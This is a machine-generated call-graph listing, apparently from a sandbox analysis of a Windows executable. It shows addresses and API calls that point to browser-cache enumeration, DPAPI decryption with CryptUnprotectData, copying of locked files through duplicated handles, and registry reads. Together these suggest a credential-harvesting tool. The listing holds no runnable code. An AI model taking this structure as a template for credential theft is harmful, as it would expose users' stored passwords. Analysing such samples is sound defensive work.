40b746 memset 38619->38621 38620->38621 38622 40b2cc 27 API calls 38621->38622 38623 40b76f 38622->38623 38624 409d1f 6 API calls 38623->38624 38625 40b783 38624->38625 39183 409b98 GetFileAttributesW 38625->39183 38627 40b792 38628 40b7c2 38627->38628 38629 409c70 2 API calls 38627->38629 39184 40bb98 38628->39184 38631 40b7a5 38629->38631 38633 40b2cc 27 API calls 38631->38633 38636 40b7b2 38633->38636 38634 40b837 CloseHandle 38638 40b83e memset 38634->38638 38635 40b817 39267 409a45 GetTempPathW 38635->39267 38639 409d1f 6 API calls 38636->38639 39217 40a6e6 WideCharToMultiByte 38638->39217 38639->38628 38640 40b827 CopyFileW 38640->38638 38642 40b866 39218 444432 38642->39218 38645 40bad5 38647 40baeb 38645->38647 38648 40bade DeleteFileW 38645->38648 38646 40b273 27 API calls 38649 40b89a 38646->38649 38650 40b04b ??3@YAXPAX 38647->38650 38648->38647 39264 438552 38649->39264 38652 40baf3 38650->38652 38652->38222 38654 40bacd 39298 443d90 111 API calls 38654->39298 38657 40bac6 39297 424f26 123 API calls 38657->39297 38658 40b8bd memset 39288 425413 17 API calls 38658->39288 38661 425413 17 API calls 38678 40b8b8 38661->38678 38664 40a71b MultiByteToWideChar 38664->38678 38667 40b9b5 memcmp 38667->38678 38668 4099c6 2 API calls 38668->38678 38669 404423 38 API calls 38669->38678 38672 40bb3e memset memcpy 39299 40a734 MultiByteToWideChar 38672->39299 38673 4251c4 137 API calls 38673->38678 38675 40bb88 LocalFree 38675->38678 38678->38657 38678->38658 38678->38661 38678->38664 38678->38667 38678->38668 38678->38669 38678->38672 38678->38673 38679 40ba5f memcmp 38678->38679 38680 40a734 MultiByteToWideChar 38678->38680 39289 4253ef 16 API calls 38678->39289 39290 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38678->39290 39291 4253af 17 API calls 38678->39291 39292 4253cf 17 API calls 38678->39292 39293 447280 memset 38678->39293 39294 447960 memset memcpy memcpy memcpy 38678->39294 39295 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38678->39295 39296 447920 memcpy memcpy memcpy 38678->39296 38679->38678 38680->38678 38681->38224 38683 40aebe FindClose 38682->38683 38684 40ae21 38683->38684 38685 4099c6 2 API calls 38684->38685 38686 40ae35 38685->38686 38687 409d1f 6 API calls 38686->38687 38688 40ae49 38687->38688 38688->38264 38690 40ade0 38689->38690 38691 40ae0f 38689->38691 38690->38691 38692 40ade7 wcscmp 38690->38692 38691->38264 38692->38691 38693 40adfe wcscmp 38692->38693 38693->38691 38695 40ae7b FindNextFileW 38694->38695 38696 40ae5c FindFirstFileW 38694->38696 38697 40ae94 38695->38697 38698 40ae8f 38695->38698 38696->38697 38699 409d1f 6 API calls 38697->38699 38701 40aeb6 38697->38701 38700 40aebe FindClose 38698->38700 38699->38701 38700->38697 38701->38264 38703 40aed1 38702->38703 38704 40aec7 FindClose 38702->38704 38703->38278 38704->38703 38706 4099d7 38705->38706 38707 4099da memcpy 38705->38707 38706->38707 38707->38208 38709 40b2cc 27 API calls 38708->38709 38710 44543f 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 44544f 38711->38712 39657 409b98 GetFileAttributesW 38712->39657 38714 445476 38717 40b2cc 27 API calls 38714->38717 38715 44545e 38715->38714 38716 40b6ef 253 API calls 38715->38716 38716->38714 38718 445482 38717->38718 38719 409d1f 6 API calls 38718->38719 38720 445492 38719->38720 39658 409b98 GetFileAttributesW 38720->39658 38722 4454a1 38723 4454b9 38722->38723 38724 40b6ef 253 API calls 38722->38724 38723->38237 38724->38723 38725->38236 38726->38254 38727->38261 38728->38299 38729->38281 38730->38326 38731->38326 38732->38308 38733->38337 38734->38339 38735->38341 38737 414c2e 17 API calls 38736->38737 38738 40c2ae 38737->38738 38794 40c1d3 38738->38794 38743 40c3be 38760 40a8ab 38743->38760 38744 40afcf 2 API calls 38745 40c2fd FindFirstUrlCacheEntryW 38744->38745 38746 40c3b6 38745->38746 38747 40c31e wcschr 38745->38747 38748 40b04b ??3@YAXPAX 38746->38748 38749 40c331 38747->38749 38750 40c35e FindNextUrlCacheEntryW 38747->38750 38748->38743 38751 40a8ab 9 API calls 38749->38751 38750->38747 38752 40c373 GetLastError 38750->38752 38755 40c33e wcschr 38751->38755 38753 40c3ad FindCloseUrlCache 38752->38753 38754 40c37e 38752->38754 38753->38746 38756 40afcf 2 API calls 38754->38756 38755->38750 38757 40c34f 38755->38757 38758 40c391 FindNextUrlCacheEntryW 38756->38758 38759 40a8ab 9 API calls 38757->38759 38758->38747 38758->38753 38759->38750 38888 40a97a 38760->38888 38763 40a8cc 38763->38348 38764 40a8d0 7 API calls 38764->38763 38893 40b1ab free free 38765->38893 38767 40c3dd 38768 40b2cc 27 API calls 38767->38768 38769 40c3e7 38768->38769 38894 414592 RegOpenKeyExW 38769->38894 38771 40c3f4 38772 40c50e 38771->38772 38773 40c3ff 38771->38773 38787 405337 38772->38787 38774 40a9ce 4 API calls 38773->38774 38775 40c418 memset 38774->38775 38895 40aa1d 38775->38895 38778 40c471 38780 40c47a _wcsupr 38778->38780 38779 40c505 RegCloseKey 38779->38772 38781 40a8d0 7 API calls 38780->38781 38782 40c498 38781->38782 38783 40a8d0 7 API calls 38782->38783 38784 40c4ac memset 38783->38784 38785 40aa1d 38784->38785 38786 40c4e4 RegEnumValueW 38785->38786 38786->38779 38786->38780 38897 405220 38787->38897 38790->38359 38791->38361 38792->38362 38793->38355 38795 40ae18 9 API calls 38794->38795 38801 40c210 38795->38801 38796 40ae51 9 API calls 38796->38801 38797 40c264 38798 40aebe FindClose 38797->38798 38800 40c26f 38798->38800 38799 40add4 2 API calls 38799->38801 38806 40e5ed memset memset 38800->38806 38801->38796 38801->38797 38801->38799 38802 40c231 _wcsicmp 38801->38802 38803 40c1d3 35 API calls 38801->38803 38802->38801 38804 40c248 38802->38804 38803->38801 38819 40c084 22 API calls 38804->38819 38807 414c2e 17 API calls 38806->38807 38808 40e63f 38807->38808 38809 409d1f 6 API calls 38808->38809 38810 40e658 38809->38810 38820 409b98 GetFileAttributesW 38810->38820 38812 40e667 38813 40e680 38812->38813 38815 409d1f 6 API calls 38812->38815 38821 409b98 GetFileAttributesW 38813->38821 38815->38813 38816 40e68f 38818 40c2d8 38816->38818 38822 40e4b2 38816->38822 38818->38743 38818->38744 38819->38801 38820->38812 38821->38816 38843 40e01e 38822->38843 38824 40e593 38825 40e5b0 38824->38825 38826 40e59c DeleteFileW 38824->38826 38828 40b04b ??3@YAXPAX 38825->38828 38826->38825 38827 40e521 38827->38824 38866 40e175 38827->38866 38829 40e5bb 38828->38829 38831 40e5c4 CloseHandle 38829->38831 38832 40e5cc 38829->38832 38831->38832 38834 40b633 free 38832->38834 38833 40e573 38836 40e584 38833->38836 38837 40e57c CloseHandle 38833->38837 38835 40e5db 38834->38835 38840 40b633 free 38835->38840 38887 40b1ab free free 38836->38887 38837->38836 38839 40e540 38839->38833 38886 40e2ab 30 API calls 38839->38886 38841 40e5e3 38840->38841 38841->38818 38844 406214 22 API calls 38843->38844 38845 40e03c 38844->38845 38846 40e16b 38845->38846 38847 40dd85 75 API calls 38845->38847 38846->38827 38848 40e06b 38847->38848 38848->38846 38849 40afcf ??2@YAPAXI ??3@YAXPAX 38848->38849 38850 40e08d OpenProcess 38849->38850 38851 40e0a4 GetCurrentProcess DuplicateHandle 38850->38851 38855 40e152 38850->38855 38852 40e0d0 GetFileSize 38851->38852 38853 40e14a CloseHandle 38851->38853 38856 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38852->38856 38853->38855 38854 40e160 38858 40b04b ??3@YAXPAX 38854->38858 38855->38854 38857 406214 22 API calls 38855->38857 38859 40e0ea 38856->38859 38857->38854 38858->38846 38860 4096dc CreateFileW 38859->38860 38861 40e0f1 CreateFileMappingW 38860->38861 38862 40e140 CloseHandle CloseHandle 38861->38862 38863 40e10b MapViewOfFile 38861->38863 38862->38853 38864 40e13b CloseHandle 38863->38864 38865 40e11f WriteFile UnmapViewOfFile 38863->38865 38864->38862 38865->38864 38867 40e18c 38866->38867 38868 406b90 11 API calls 38867->38868 38869 40e19f 38868->38869 38870 40e1a7 memset 38869->38870 38871 40e299 38869->38871 38876 40e1e8 38870->38876 38872 4069a3 ??3@YAXPAX free 38871->38872 38873 40e2a4 38872->38873 38873->38839 38874 406e8f 13 API calls 38874->38876 38875 406b53 SetFilePointerEx ReadFile 38875->38876 38876->38874 38876->38875 38877 40e283 38876->38877 38878 40dd50 _wcsicmp 38876->38878 38882 40742e 8 API calls 38876->38882 38883 40aae3 wcslen wcslen _memicmp 38876->38883 38884 40e244 _snwprintf 38876->38884 38879 40e291 38877->38879 38880 40e288 free 38877->38880 38878->38876 38881 40aa04 free 38879->38881 38880->38879 38881->38871 38882->38876 38883->38876 38885 40a8d0 7 API calls 38884->38885 38885->38876 38886->38839 38887->38824 38892 40a980 38888->38892 38889 40a8bb 38889->38763 38889->38764 38890 40a995 _wcsicmp 38890->38892 38891 40a99c wcscmp 38891->38892 38892->38889 38892->38890 38892->38891 38893->38767 38894->38771 38896 40aa23 RegEnumValueW 38895->38896 38896->38778 38896->38779 38898 405335 38897->38898 38899 40522a 38897->38899 38898->38362 38900 40b2cc 27 API calls 38899->38900 38901 405234 38900->38901 38902 40a804 8 API calls 38901->38902 38903 40523a 38902->38903 38942 40b273 38903->38942 38905 405248 _mbscpy _mbscat GetProcAddress 38906 40b273 27 API calls 38905->38906 38907 405279 38906->38907 38945 405211 GetProcAddress 38907->38945 38909 405282 38910 40b273 27 API calls 38909->38910 38911 40528f 38910->38911 38946 405211 GetProcAddress 38911->38946 38913 405298 38914 40b273 27 API calls 38913->38914 38915 4052a5 38914->38915 38947 405211 GetProcAddress 38915->38947 38917 4052ae 38918 40b273 27 API calls 38917->38918 38919 4052bb 38918->38919 38948 405211 GetProcAddress 38919->38948 38921 4052c4 38922 40b273 27 API calls 38921->38922 38923 4052d1 38922->38923 38949 405211 GetProcAddress 38923->38949 38925 4052da 38926 40b273 27 API calls 38925->38926 38927 4052e7 38926->38927 38950 405211 GetProcAddress 38927->38950 38929 4052f0 38930 40b273 27 API calls 38929->38930 38931 4052fd 38930->38931 38951 405211 GetProcAddress 38931->38951 38933 405306 38934 40b273 27 API calls 38933->38934 38935 405313 38934->38935 38952 405211 GetProcAddress 38935->38952 38937 40531c 38938 40b273 27 API calls 38937->38938 38939 405329 38938->38939 38953 405211 GetProcAddress 38939->38953 38943 40b58d 27 API calls 38942->38943 38944 40b18c 38943->38944 38944->38905 38945->38909 38946->38913 38947->38917 38948->38921 38949->38925 38950->38929 38951->38933 38952->38937 38955 40440c FreeLibrary 38954->38955 38956 40436d 38955->38956 38957 40a804 8 API calls 38956->38957 38958 404377 38957->38958 38959 404383 38958->38959 38960 404405 38958->38960 38961 40b273 27 API calls 38959->38961 38960->38366 38960->38370 38962 40438d GetProcAddress 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4043a7 GetProcAddress 38963->38964 38965 40b273 27 API calls 38964->38965 38966 4043ba GetProcAddress 38965->38966 38967 40b273 27 API calls 38966->38967 38968 4043ce GetProcAddress 38967->38968 38969 40b273 27 API calls 38968->38969 38970 4043e2 GetProcAddress 38969->38970 38971 4043f1 38970->38971 38972 4043f7 38971->38972 38973 40440c FreeLibrary 38971->38973 38972->38960 38973->38960 38975 404413 FreeLibrary 38974->38975 38976 40441e 38974->38976 38975->38976 38976->38382 38977->38374 38979 40447e 38978->38979 38980 40442e 38978->38980 38981 404485 CryptUnprotectData 38979->38981 38982 40449c 38979->38982 38983 40b2cc 27 API calls 38980->38983 38981->38982 38982->38374 38984 404438 38983->38984 38985 40a804 8 API calls 38984->38985 38986 40443e 38985->38986 38987 404445 38986->38987 38988 404467 38986->38988 38989 40b273 27 API calls 38987->38989 38988->38979 38990 404475 FreeLibrary 38988->38990 38991 40444f GetProcAddress 38989->38991 38990->38979 38991->38988 38992 404460 38991->38992 38992->38988 38994 4135f6 38993->38994 38995 4135eb FreeLibrary 38993->38995 38994->38385 38995->38994 38997 4449c4 38996->38997 38998 444a52 38996->38998 38999 40b2cc 27 API calls 38997->38999 38998->38405 38998->38406 39000 4449cb 38999->39000 39001 40a804 8 API calls 39000->39001 39002 4449d1 39001->39002 39003 40b273 27 API calls 39002->39003 39004 4449dc GetProcAddress 39003->39004 39005 40b273 27 API calls 39004->39005 39006 4449f3 GetProcAddress 39005->39006 39007 40b273 27 API calls 39006->39007 39008 444a04 GetProcAddress 39007->39008 39009 40b273 27 API calls 39008->39009 39010 444a15 GetProcAddress 39009->39010 39011 40b273 27 API calls 39010->39011 39012 444a26 GetProcAddress 39011->39012 39013 40b273 27 API calls 39012->39013 39014 444a37 GetProcAddress 39013->39014 39017->38416 39018->38416 39019->38416 39020->38416 39021->38407 39023 403a29 39022->39023 39037 403bed memset memset 39023->39037 39025 403ae7 39050 40b1ab free free 39025->39050 39026 403a3f memset 39031 403a2f 39026->39031 39028 403aef 39028->38423 39029 40a8d0 7 API calls 39029->39031 39030 409d1f 6 API calls 39030->39031 39031->39025 39031->39026 39031->39029 39031->39030 39032 409b98 GetFileAttributesW 39031->39032 39032->39031 39034 40a051 GetFileTime CloseHandle 39033->39034 39035 4039ca CompareFileTime 39033->39035 39034->39035 39035->38423 39036->38424 39038 414c2e 17 API calls 39037->39038 39039 403c38 39038->39039 39040 409719 2 API calls 39039->39040 39041 403c3f wcscat 39040->39041 39042 414c2e 17 API calls 39041->39042 39043 403c61 39042->39043 39044 409719 2 API calls 39043->39044 39045 403c68 wcscat 39044->39045 39051 403af5 39045->39051 39048 403af5 20 API calls 39049 403c95 39048->39049 39049->39031 39050->39028 39052 403b02 39051->39052 39053 40ae18 9 API calls 39052->39053 39061 403b37 39053->39061 39054 403bdb 39056 40aebe FindClose 39054->39056 39055 40add4 wcscmp wcscmp 39055->39061 39057 403be6 39056->39057 39057->39048 39058 40ae18 9 API calls 39058->39061 39059 40ae51 9 API calls 39059->39061 39060 40aebe FindClose 39060->39061 39061->39054 39061->39055 39061->39058 39061->39059 39061->39060 39062 40a8d0 7 API calls 39061->39062 39062->39061 39064 409d1f 6 API calls 39063->39064 39065 404190 39064->39065 39078 409b98 GetFileAttributesW 39065->39078 39067 40419c 39068 4041a7 6 API calls 39067->39068 39069 40435c 39067->39069 39071 40424f 39068->39071 39069->38450 39071->39069 39072 40425e memset 39071->39072 39074 409d1f 6 API calls 39071->39074 39075 40a8ab 9 API calls 39071->39075 39079 414842 39071->39079 39072->39071 39073 404296 wcscpy 39072->39073 39073->39071 39074->39071 39076 4042b6 memset memset _snwprintf wcscpy 39075->39076 39076->39071 39077->38448 39078->39067 39082 41443e 39079->39082 39081 414866 39081->39071 39083 41444b 39082->39083 39084 414451 39083->39084 39085 4144a3 GetPrivateProfileStringW 39083->39085 39086 414491 39084->39086 39087 414455 wcschr 39084->39087 39085->39081 39089 414495 WritePrivateProfileStringW 39086->39089 39087->39086 39088 414463 _snwprintf 39087->39088 39088->39089 39089->39081 39090->38454 39092 40b2cc 27 API calls 39091->39092 39093 409615 39092->39093 39094 409d1f 6 API calls 39093->39094 39095 409625 39094->39095 39118 409b98 GetFileAttributesW 39095->39118 39097 409634 39098 409648 39097->39098 39135 4091b8 241 API calls 39097->39135 39100 40b2cc 27 API calls 39098->39100 39102 408801 39098->39102 39101 40965d 39100->39101 39103 409d1f 6 API calls 39101->39103 39102->38457 39102->38458 39104 40966d 39103->39104 39119 409b98 GetFileAttributesW 39104->39119 39106 40967c 39106->39102 39120 409529 39106->39120 39118->39097 39119->39106 39136 4096c3 CreateFileW 39120->39136 39122 409543 39123 409550 GetFileSize 39122->39123 39134 4095cd 39122->39134 39124 409577 CloseHandle 39123->39124 39125 40955f 39123->39125 39131 409585 39124->39131 39124->39134 39126 40afcf 2 API calls 39125->39126 39127 409569 39126->39127 39137 40a2ef ReadFile 39127->39137 39129 409574 39129->39124 39130 4095c3 39139 40908b 57 API calls 39130->39139 39131->39130 39131->39134 39138 408b8d 38 API calls 39131->39138 39134->39102 39135->39098 39136->39122 39137->39129 39138->39131 39139->39134 39167 413f4f 39140->39167 39143 413f37 K32GetModuleFileNameExW 39144 413f4a 39143->39144 39144->38518 39146 413969 wcscpy 39145->39146 39147 41396c wcschr 39145->39147 39158 413a3a 39146->39158 39147->39146 39149 41398e 39147->39149 39172 4097f7 wcslen wcslen _memicmp 39149->39172 39151 41399a 39152 4139a4 memset 39151->39152 39153 4139e6 39151->39153 39173 409dd5 GetWindowsDirectoryW wcscpy 39152->39173 39154 413a31 wcscpy 39153->39154 39155 4139ec memset 39153->39155 39154->39158 39174 409dd5 GetWindowsDirectoryW wcscpy 39155->39174 39158->38518 39159 4139c9 wcscpy wcscat 39159->39158 39160 413a11 memcpy wcscat 39160->39158 39162 413cb0 GetModuleHandleW 39161->39162 39163 413cda 39161->39163 39162->39163 39164 413cbf GetProcAddress 39162->39164 39165 413ce3 GetProcessTimes 39163->39165 39166 413cf6 39163->39166 39164->39163 39165->38520 39166->38520 39168 413f2f 39167->39168 39169 413f54 39167->39169 39168->39143 39168->39144 39170 40a804 8 API calls 39169->39170 39171 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39170->39171 39171->39168 39172->39151 39173->39159 39174->39160 39175->38541 39176->38563 39178 409cf9 GetVersionExW 39177->39178 39179 409d0a 39177->39179 39178->39179 39179->38570 39179->38575 39180->38577 39181->38580 39182->38582 39183->38627 39185 40bba5 39184->39185 39300 40cc26 39185->39300 39188 40bd4b 39321 40cc0c 39188->39321 39193 40b2cc 27 API calls 39194 40bbef 39193->39194 39328 40ccf0 _wcsicmp 39194->39328 39196 40bbf5 39196->39188 39329 40ccb4 6 API calls 39196->39329 39198 40bc26 39199 40cf04 17 API calls 39198->39199 39200 40bc2e 39199->39200 39201 40bd43 39200->39201 39202 40b2cc 27 API calls 39200->39202 39203 40cc0c 4 API calls 39201->39203 39204 40bc40 39202->39204 39203->39188 39330 40ccf0 _wcsicmp 39204->39330 39206 40bc46 39206->39201 39207 40bc61 memset memset WideCharToMultiByte 39206->39207 39331 40103c strlen 39207->39331 39209 40bcc0 39210 40b273 27 API calls 39209->39210 39211 40bcd0 memcmp 39210->39211 39211->39201 39212 40bce2 39211->39212 39213 404423 38 API calls 39212->39213 39214 40bd10 39213->39214 39214->39201 39215 40bd3a LocalFree 39214->39215 39216 40bd1f memcpy 39214->39216 39215->39201 39216->39215 39217->38642 39391 4438b5 39218->39391 39220 44444c 39226 40b879 39220->39226 39405 415a6d 39220->39405 39222 444486 39225 4444b9 memcpy 39222->39225 39263 4444a4 39222->39263 39224 44469e 39224->39226 39456 443d90 111 API calls 39224->39456 39409 415258 39225->39409 39226->38645 39226->38646 39229 444524 39230 444541 39229->39230 39231 44452a 39229->39231 39412 444316 39230->39412 39446 416935 16 API calls 39231->39446 39235 444316 18 API calls 39236 444563 39235->39236 39237 444316 18 API calls 39236->39237 39238 44456f 39237->39238 39239 444316 18 API calls 39238->39239 39240 44457f 39239->39240 39240->39263 39426 432d4e 39240->39426 39243 444316 18 API calls 39244 4445b0 39243->39244 39430 41eed2 39244->39430 39246 4445cf 39247 4445d6 39246->39247 39248 4445ee 39246->39248 39447 416935 16 API calls 39247->39447 39448 43302c memset 39248->39448 39251 4445fa 39449 43302c memset 39251->39449 39253 444609 39253->39263 39450 416935 16 API calls 39253->39450 39255 444646 39451 434d4b 17 API calls 39255->39451 39257 44464d 39452 437655 16 API calls 39257->39452 39259 444653 39453 4442e6 11 API calls 39259->39453 39261 44465d 39261->39263 39454 416935 16 API calls 39261->39454 39455 4442e6 11 API calls 39263->39455 39494 438460 39264->39494 39266 40b8a4 39266->38654 39270 4251c4 39266->39270 39268 409a74 GetTempFileNameW 39267->39268 39269 409a66 GetWindowsDirectoryW 39267->39269 39268->38640 39269->39268 39591 424f07 11 API calls 39270->39591 39272 4251e4 39273 4251f7 39272->39273 39274 4251e8 39272->39274 39593 4250f8 39273->39593 39592 4446ea 11 API calls 39274->39592 39276 4251f2 39276->38678 39278 425209 39281 425249 39278->39281 39284 4250f8 127 API calls 39278->39284 39285 425287 39278->39285 39601 4384e9 135 API calls 39278->39601 39602 424f74 124 API calls 39278->39602 39281->39285 39603 424ff0 13 API calls 39281->39603 39284->39278 39605 415c7d 16 API calls 39285->39605 39286 425266 39286->39285 39604 415be9 memcpy 39286->39604 39288->38678 39289->38678 39290->38678 39291->38678 39292->38678 39293->38678 39294->38678 39295->38678 39296->38678 39297->38654 39298->38645 39299->38675 39332 4096c3 CreateFileW 39300->39332 39302 40cc34 39303 40cc3d GetFileSize 39302->39303 39311 40bbca 39302->39311 39304 40afcf 2 API calls 39303->39304 39305 40cc64 39304->39305 39333 40a2ef ReadFile 39305->39333 39307 40cc71 39334 40ab4a MultiByteToWideChar 39307->39334 39309 40cc95 CloseHandle 39310 40b04b ??3@YAXPAX 39309->39310 39310->39311 39311->39188 39312 40cf04 39311->39312 39313 40b633 free 39312->39313 39314 40cf14 39313->39314 39340 40b1ab free free 39314->39340 39316 40bbdd 39316->39188 39316->39193 39317 40cf1b 39317->39316 39319 40cfef 39317->39319 39341 40cd4b 39317->39341 39320 40cd4b 14 API calls 39319->39320 39320->39316 39322 40b633 free 39321->39322 39323 40cc15 39322->39323 39324 40aa04 free 39323->39324 39325 40cc1d 39324->39325 39390 40b1ab free free 39325->39390 39327 40b7d4 memset CreateFileW 39327->38634 39327->38635 39328->39196 39329->39198 39330->39206 39331->39209 39332->39302 39333->39307 39335 40ab93 39334->39335 39336 40ab6b 39334->39336 39335->39309 39337 40a9ce 4 API calls 39336->39337 39338 40ab74 39337->39338 39339 40ab7c MultiByteToWideChar 39338->39339 39339->39335 39340->39317 39342 40cd7b 39341->39342 39375 40aa29 39342->39375 39344 40cef5 39345 40aa04 free 39344->39345 39346 40cefd 39345->39346 39346->39317 39348 40aa29 6 API calls 39349 40ce1d 39348->39349 39350 40aa29 6 API calls 39349->39350 39351 40ce3e 39350->39351 39352 40ce6a 39351->39352 39383 40abb7 wcslen memmove 39351->39383 39353 40ce9f 39352->39353 39386 40abb7 wcslen memmove 39352->39386 39355 40a8d0 7 API calls 39353->39355 39358 40ceb5 39355->39358 39356 40ce56 39384 40aa71 wcslen 39356->39384 39364 40a8d0 7 API calls 39358->39364 39360 40ce8b 39387 40aa71 wcslen 39360->39387 39361 40ce5e 39385 40abb7 wcslen memmove 39361->39385 39366 40cecb 39364->39366 39365 40ce93 39388 40abb7 wcslen memmove 39365->39388 39389 40d00b malloc memcpy free free 39366->39389 39369 40cedd 39370 40aa04 free 39369->39370 39371 40cee5 39370->39371 39372 40aa04 free 39371->39372 39373 40ceed 39372->39373 39374 40aa04 free 39373->39374 39374->39344 39376 40aa33 39375->39376 39377 40aa63 39375->39377 39378 40aa44 39376->39378 39379 40aa38 wcslen 39376->39379 39377->39344 39377->39348 39380 40a9ce malloc memcpy free free 39378->39380 39379->39378 39381 40aa4d 39380->39381 39381->39377 39382 40aa51 memcpy 39381->39382 39382->39377 39383->39356 39384->39361 39385->39352 39386->39360 39387->39365 39388->39353 39389->39369 39390->39327 39392 4438d0 39391->39392 39402 4438c9 39391->39402 39457 415378 memcpy memcpy 39392->39457 39402->39220 39406 415a77 39405->39406 39407 415a8d 39406->39407 39408 415a7e memset 39406->39408 39407->39222 39408->39407 39410 4438b5 11 API calls 39409->39410 39411 41525d 39410->39411 39411->39229 39413 444328 39412->39413 39414 444423 39413->39414 39415 44434e 39413->39415 39460 4446ea 11 API calls 39414->39460 39417 432d4e 3 API calls 39415->39417 39418 44435a 39417->39418 39420 444375 39418->39420 39425 44438b 39418->39425 39419 432d4e 3 API calls 39421 4443ec 39419->39421 39458 416935 16 API calls 39420->39458 39423 444381 39421->39423 39459 416935 16 API calls 39421->39459 39423->39235 39425->39419 39427 432d65 39426->39427 39428 432d58 39426->39428 39427->39243 39461 432cc4 memset memset memcpy 39428->39461 39431 41eee2 39430->39431 39432 415a6d memset 39431->39432 39433 41ef23 39432->39433 39434 415a6d memset 39433->39434 39438 41ef2d 39433->39438 39435 41ef42 39434->39435 39439 41ef49 39435->39439 39462 41b7d9 39435->39462 39437 41ef66 39437->39439 39440 41ef74 memset 39437->39440 39438->39246 39439->39438 39480 41b321 101 API calls 39439->39480 39442 41ef91 39440->39442 39444 41ef9e 39440->39444 39476 41519d 39442->39476 39444->39439 39479 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39444->39479 39446->39263 39447->39263 39448->39251 39449->39253 39450->39255 39451->39257 39452->39259 39453->39261 39454->39263 39455->39224 39456->39226 39458->39423 39459->39423 39460->39423 39461->39427 39463 41b812 39462->39463 39471 41b884 39463->39471 39474 41b849 39463->39474 39481 444706 11 API calls 39463->39481 39464 415a6d memset 39465 41b8c2 39464->39465 39466 41b980 39465->39466 39467 41b902 memcpy memcpy memcpy memcpy memcpy 39465->39467 39465->39474 39473 41b9ad 39466->39473 39482 4151e3 39466->39482 39467->39466 39470 41ba12 39472 41ba32 memset 39470->39472 39470->39474 39471->39464 39471->39474 39472->39474 39473->39474 39485 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39473->39485 39474->39437 39486 4175ed 39476->39486 39479->39439 39480->39438 39481->39471 39484 41837f 55 API calls 39482->39484 39483 4151f9 39483->39473 39484->39483 39485->39470 39487 417570 SetFilePointer GetLastError GetLastError 39486->39487 39488 4175ff 39487->39488 39489 41760a ReadFile 39488->39489 39492 4151b3 39488->39492 39490 417637 39489->39490 39491 417627 GetLastError 39489->39491 39490->39492 39493 41763e memset 39490->39493 39491->39492 39492->39444 39493->39492 39506 41703f 39494->39506 39496 43847a 39497 43848a 39496->39497 39498 43847e 39496->39498 39513 438270 39497->39513 39543 4446ea 11 API calls 39498->39543 39502 438488 39502->39266 39504 4384bb 39505 438270 134 API calls 39504->39505 39505->39502 39507 417044 39506->39507 39508 41705c 39506->39508 39512 417055 39507->39512 39545 416760 11 API calls 39507->39545 39509 417075 39508->39509 39546 41707a 11 API calls 39508->39546 39509->39496 39512->39496 39547 415a91 39513->39547 39515 43828d 39516 438297 39515->39516 39517 438341 39515->39517 39519 4382d6 39515->39519 39590 415c7d 16 API calls 39516->39590 39551 44358f 39517->39551 39522 4382fb 39519->39522 39523 4382db 39519->39523 39521 438458 39521->39502 39544 424f26 123 API calls 39521->39544 39584 415c23 memcpy 39522->39584 39582 416935 16 API calls 39523->39582 39526 438305 39530 44358f 19 API calls 39526->39530 39532 438318 39526->39532 39527 4382e9 39583 415c7d 16 API calls 39527->39583 39529 438373 39535 438383 39529->39535 39585 4300e8 memset memset memcpy 39529->39585 39530->39532 39532->39529 39577 43819e 39532->39577 39534 4383cd 39536 4383f5 39534->39536 39587 42453e 123 API calls 39534->39587 39535->39534 39586 415c23 memcpy 39535->39586 39539 438404 39536->39539 39540 43841c 39536->39540 39588 416935 16 API calls 39539->39588 39589 416935 16 API calls 39540->39589 39543->39502 39544->39504 39545->39512 39546->39507 39548 415a9d 39547->39548 39549 415ab3 39548->39549 39550 415aa4 memset 39548->39550 39549->39515 39550->39549 39553 4435be 39551->39553 39552 443676 39554 443758 39552->39554 39556 442ff8 19 API calls 39552->39556 39559 443737 39552->39559 39553->39552 39558 442ff8 19 API calls 39553->39558 39560 4436ce 39553->39560 39561 44366c 39553->39561 39575 44360c 39553->39575 39555 441409 memset 39554->39555 39567 443775 39554->39567 39555->39554 39556->39559 39557 442ff8 19 API calls 39557->39554 39558->39553 39559->39557 39563 4165ff 11 API calls 39560->39563 39564 4169a7 11 API calls 39561->39564 39562 4437be 39565 416760 11 API calls 39562->39565 39566 4437de 39562->39566 39563->39552 39564->39552 39565->39566 39568 42463b memset memcpy 39566->39568 39570 443801 39566->39570 39567->39562 39571 415c56 11 API calls 39567->39571 39568->39570 39569 443826 39572 43bd08 memset 39569->39572 39570->39569 39573 43024d memset 39570->39573 39571->39562 39574 443837 39572->39574 39573->39569 39574->39575 39576 43024d memset 39574->39576 39575->39532 39576->39574 39578 438246 39577->39578 39580 4381ba 39577->39580 39578->39529 39579 41f432 110 API calls 39579->39580 39580->39578 39580->39579 39581 41f638 104 API calls 39580->39581 39581->39580 39582->39527 39583->39516 39584->39526 39585->39535 39586->39534 39587->39536 39588->39516 39589->39516 39590->39521 39591->39272 39592->39276 39594 425108 39593->39594 39600 42510d 39593->39600 39638 424f74 124 API calls 39594->39638 39597 42516e 39639 415c7d 16 API calls 39597->39639 39598 425115 39598->39278 39600->39598 39606 42569b 39600->39606 39601->39278 39602->39278 39603->39286 39604->39285 39605->39276 39607 4256f1 39606->39607 39634 4259c2 39606->39634 39613 4259da 39607->39613 39617 422aeb memset memcpy memcpy 39607->39617 39618 429a4d 39607->39618 39623 4260a1 39607->39623 39632 429ac1 39607->39632 39607->39634 39637 425a38 39607->39637 39640 4227f0 memset memcpy 39607->39640 39641 422b84 15 API calls 39607->39641 39642 422b5d memset memcpy memcpy 39607->39642 39643 422640 13 API calls 39607->39643 39645 4241fc 11 API calls 39607->39645 39646 42413a 90 API calls 39607->39646 39612 4260dd 39651 424251 120 API calls 39612->39651 39650 416760 11 API calls 39613->39650 39617->39607 39619 429a66 39618->39619 39620 429a9b 39618->39620 39652 415c56 11 API calls 39619->39652 39624 429a96 39620->39624 39654 416760 11 API calls 39620->39654 39649 415c56 11 API calls 39623->39649 39655 424251 120 API calls 39624->39655 39626 429a7a 39653 416760 11 API calls 39626->39653 39633 425ad6 39632->39633 39656 415c56 11 API calls 39632->39656 39633->39597 39634->39633 39644 415c56 11 API calls 39634->39644 39637->39634 39647 422640 13 API calls 39637->39647 39648 4226e0 12 API calls 39637->39648 39638->39600 